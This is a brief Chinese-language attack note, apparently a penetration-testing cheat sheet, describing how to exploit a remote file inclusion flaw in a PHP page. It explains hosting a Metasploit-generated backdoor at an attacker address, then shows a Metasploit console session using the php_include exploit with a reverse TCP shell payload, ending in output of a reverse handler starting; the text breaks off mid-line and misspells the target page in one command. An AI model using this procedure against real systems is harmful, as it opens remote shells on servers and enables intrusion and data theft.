原理: METASPLOIT生成PHP 或者PYTHON的DOOR EG: http://5.5.5.3:1111/1.txt
然后/lfi.php?file=http://5.5.5.3:1111/1.txt
启动METASPLOIT
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > set RHOST 5.5.5.2
RHOST => 5.5.5.2
msf exploit(php_include) > set PATH /
PATH => /
msf exploit(php_include) > set PHPURI lif.php?file=/etc/passwd
PHPURI => lif.php?file=/etc/passwd
msf exploit(php_include) > set URIPATH /1.txt
URIPATH => /1.txt
msf exploit(php_include) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(php_include) > exploit
[*] Started reverse handler on 5.5.5.3:4444
[*] Using URL: http://5.5.5.3:1111/1.txt
[*] PHP include ser